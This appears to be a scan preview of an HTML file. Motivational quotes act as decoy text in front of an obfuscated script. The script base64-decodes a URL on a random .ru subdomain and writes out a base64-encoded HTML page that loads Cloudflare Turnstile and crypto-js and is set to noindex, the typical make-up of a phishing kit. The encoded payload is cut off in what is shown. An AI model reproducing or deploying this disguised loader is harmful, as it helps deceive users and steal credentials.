                  Preview: Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful. -->.. Success is how high you bounce when you hit bottom. -->..<script>../* Success is how high you bounce when you hit bottom. */..if(atob("aHR0cHM6Ly83bTl4NC53dHljcGV5eWJwLnJ1L0d4ZVFLLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZX
                  No static file info